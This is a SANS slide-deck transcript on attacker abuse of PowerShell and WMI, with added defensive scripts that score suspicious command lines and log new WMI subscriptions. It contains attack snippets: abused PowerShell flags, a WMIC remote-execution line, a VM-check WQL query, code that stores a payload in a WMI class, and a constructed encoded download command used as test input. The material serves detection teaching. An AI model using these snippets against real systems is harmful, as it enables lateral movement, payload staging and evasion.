SANS Cyber Security Certifications & Research
Transcript (slide deck)
• Quick Background
• Malicious Possibilities
• Real-World Examples
• Detection & Defense
• Joe Slowik, Adversary Hunter
• Current: Dragos Adversary Hunter
• Previous:
  • Los Alamos National Lab: IR Lead
  • US Navy: Information Warfare Officer
  • University of Chicago: Philosophy Drop-Out
• Scripting and interactive language
• Introduced in 2006, integral to Win7+ since 2009
• Full access to COM & WMI for system administration
• WMI = Windows Management Instrumentation
• Interactive and scriptable framework for local and remote administration
• Frequently accessed via PowerShell
http://oversitesentry.com/wp-content/uploads/2015/08/wmiarchitecture.png
http://kevinpelgrims.com/blog/files/images/2010/02/powershell_rsm.png
http://www.opentechguides.com/how-to/article/powershell/132/get-system-info-remotely.html
https://4sysops.com/wp-content/uploads/2013/03/WBEMTest-Translate-into-PowerShell.png
http://www.freeiconspng.com/img/17209
• PowerShell is a powerful, useful tool for network administration
• Widely used in Windows Enterprise environments
• WMI enables significant access to review and modify system data
• Access via PowerShell allows for scripting and automated possibilities
• PowerShell’s ubiquity adds a significant capability for potential attackers
• Enhances ability to ‘live off the land’
• Expands initial infection vectors
| Command | Use |
|---|---|
| -EncodedCommand | Accepts Base64-encoded input for execution within PowerShell |
| (New-Object System.Net.WebClient).DownloadFile() | Download a file from a remote location; can be piped to Start-Process to execute |
| -ExecutionPolicy Bypass | Circumvent system limits on script execution |
| -WindowStyle Hidden | Hide the command window from the user |
| Invoke-Expression | Execute arbitrary code or commands |
Delivery Vectors
• VBA
• VBS
• BAT
• JS
• Registry
• Startup.lnk
https://adsecurity.org/wp-content/uploads/2016/02/PowerShell-Detection-NetWebClientDownload.jpg
• WMI is also ubiquitous, potent ‘dual-use’
• Can enable:
  • Complex exploitation, persistence on infected host
  • New vectors to pivot within network
• PsExec-like remote execution
• Malicious file/script storage
• Persistence when combined with file or registry activity
• Pentesting frameworks
• Crimeware/Commodity malware
• APT
• Malicious VBA decodes to PowerShell
• Retrieves, then executes ransomware payload
• WMI used to probe security settings
• Written to file for retrieval
• Strengthens system survey
• WMI filter retrieved on schedule
• Returns base64-encoded PowerShell
• PowerShell re-launches backdoor
https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
https://www.carbonblack.com/wp-content/uploads/2015/12/PS7.png
CMD
• Command execution
• Execution Parameters

PowerShell
• Interactive and Scripts
• Flags, Modifiers, full Visibility

WMI
• Log Events
• Correlate with Other Activity
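Added example (not from the slides): a small PowerShell scorer that applies the flag table and the CMD/PowerShell visibility points above to process-creation command lines, decoding any -EncodedCommand payload so indicators hidden inside it are scored too. The command lines, the `example.invalid` host and the function name are constructed for illustration.

```powershell
function Test-SuspiciousCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)

    # Indicators from the flag table. powershell.exe accepts unambiguous prefixes
    # (-enc, -w, -ep, -exec), so the patterns match prefixes, not only full names.
    $indicators = [ordered]@{
        'EncodedCommand'         = '(^|\s)-e(c|n\w*)?\s+[A-Za-z0-9+/=]{8,}'
        'ExecutionPolicy Bypass' = '-e(x\w*|p)\s+bypass'
        'WindowStyle Hidden'     = '-w(i\w*)?\s+h(idden)?\b'
        'WebClient download'     = '\.Download(File|String)\('
        'Invoke-Expression'      = '\b(Invoke-Expression|iex)\b'
        'WMIC remote process'    = 'wmic\s+/node:\S+\s+process\s+call\s+create'
    }

    # -EncodedCommand carries Base64 of a UTF-16LE script; decode it so indicators
    # inside the payload are scored as well as those on the outer command line.
    $decoded = $null
    if ($CommandLine -match '(^|\s)-e(c|n\w*)?\s+([A-Za-z0-9+/=]{8,})') {
        try   { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[3])) }
        catch { $decoded = '<not valid Base64>' }
    }
    $textToScan = if ($decoded) { "$CommandLine`n$decoded" } else { $CommandLine }

    $hits = @(foreach ($name in $indicators.Keys) {
        if ($textToScan -match $indicators[$name]) { $name }
    })
    [pscustomobject]@{
        Score       = $hits.Count   # 0 = nothing from the table; several hits warrant review
        Indicators  = $hits
        Decoded     = $decoded
        CommandLine = $CommandLine
    }
}

# Constructed sample command lines (not real telemetry). The encoded sample is built
# here so its Base64 is valid; the inner script uses only patterns the slide names.
$inner   = "(New-Object System.Net.WebClient).DownloadFile('http://example.invalid/x','x.exe')"
$b64     = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($inner))
$samples = @(
    'powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\Inventory.ps1',   # admin baseline
    "powershell.exe -NoP -W Hidden -Exec Bypass -Enc $b64",
    'wmic /node:HOST01 process call create "notepad.exe"'
)
$samples | ForEach-Object { Test-SuspiciousCommandLine $_ } |
    Format-Table Score, Indicators, CommandLine -AutoSize
```

The first sample scores 0, the encoded one scores 4 (EncodedCommand, ExecutionPolicy Bypass, WindowStyle Hidden and the WebClient download found only after decoding), and the WMIC line scores 1; feed it the CommandLine field of Sysmon Event 1 or Security Event 4688 records to use it on real data.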
What is required to achieve ‘bad’?
• Process Execution
• Persistence
• Encode/Decode
• Download/Upload
• Sysinternals Sysmon
• Windows Logging Service (WLS)
• WMI Logging via WMI Subscription
• PowerShell Logging
• Proprietary Host-based Security
• WLS incorporates PowerShell logging natively
• Otherwise:
  • Windows 7+
  • PowerShell 5.0+
  • Enable logging!
• See: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
• Sysinternals Sysmon – latest version includes WMI visibility
• But logging/alerting will need to be tuned
• DIY via WMI Subscription creation
• Otherwise – commercial products
Establish Visibility
Baseline ‘Normal’
Identify Malicious
Create Alerts & Alarms
Develop Response
• What PowerShell/WMI scripts are used in ‘normal’ network administration?
• What commands never have legitimate use?
• What – if any – items require whitelisting?
```cmd
REM Remote process creation via WMIC (REMOTESYSTEM and EVIL_COMMAND are placeholders)
wmic /node:REMOTESYSTEM process call create "EVIL_COMMAND"
```

```sql
-- WQL query probing the BIOS serial for a virtualised host (sandbox/VM check)
SELECT * FROM Win32_BIOS WHERE SerialNumber LIKE "%VMware%"
```

```powershell
# Storing a payload in a custom WMI class on a remote system
# ($REMOTESYSTEM is a management scope path, $PAYLOAD the stored data; both placeholders)
$BADTHING = New-Object Management.ManagementClass($REMOTESYSTEM, [String]::Empty, $null)
$BADTHING['__CLASS'] = 'Evil_Malware'
$BADTHING.Properties.Add('SomethingEvil', [Management.CimType]::String, $False)
$BADTHING.Properties['SomethingEvil'].Value = $PAYLOAD
$BADTHING.Put()   # commit the new class to the WMI repository
```
• Create Event Consumer: performs action when triggered by event
• Pair with Event Filter: events of interest
• Filter to Consumer Binding: bind filter to consumer
• Export results to log file, data store
• Credit: https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html
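Added example (not from the slides or the FireEye post): the filter, consumer and binding steps above implemented as a permanent WMI subscription that writes a line to a log file whenever a new consumer, filter or binding appears in root\subscription, the objects WMI persistence needs. Assumes an elevated Windows PowerShell session; the object names and log path are illustrative.

```powershell
$ns      = 'root\subscription'
$logPath = 'C:\Windows\Temp\wmi-monitor.log'   # assumed location; point it at collected storage

# 1. Event Filter: fire when a new consumer, filter or binding appears in root\subscription.
#    WITHIN is mandatory for these intrinsic (polled) events; 5 seconds is a common value.
$query = @"
SELECT * FROM __InstanceCreationEvent WITHIN 5
WHERE TargetInstance ISA '__EventConsumer'
   OR TargetInstance ISA '__EventFilter'
   OR TargetInstance ISA '__FilterToConsumerBinding'
"@
$filter = Set-WmiInstance -Namespace $ns -Class __EventFilter -Arguments @{
    Name           = 'Monitor_WmiSubscription_Filter'
    EventNamespace = $ns
    QueryLanguage  = 'WQL'
    Query          = $query
}

# 2. Event Consumer: append one line per event to the log. %...% tokens are WMI
#    standard-string-template substitutions taken from the delivered event.
#    (Bindings have no Name property, so that field is blank for them.)
$consumer = Set-WmiInstance -Namespace $ns -Class LogFileEventConsumer -Arguments @{
    Name            = 'Monitor_WmiSubscription_Consumer'
    Filename        = $logPath
    Text            = 'New WMI subscription object created: %TargetInstance.Name%'
    MaximumFileSize = 10485760   # 10 MiB before rollover
}

# 3. Binding: connect filter to consumer so the consumer runs when the filter matches.
#    Created last, so the monitor does not log its own filter and consumer.
Set-WmiInstance -Namespace $ns -Class __FilterToConsumerBinding -Arguments @{
    Filter   = $filter
    Consumer = $consumer
} | Out-Null

# Baseline 'normal': what is already subscribed, so new log lines can be judged against it.
Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
    Select-Object Filter, Consumer
```

Forward the log file to the SIEM alongside Sysmon's WMI events (19, 20, 21) so the two sources corroborate each other.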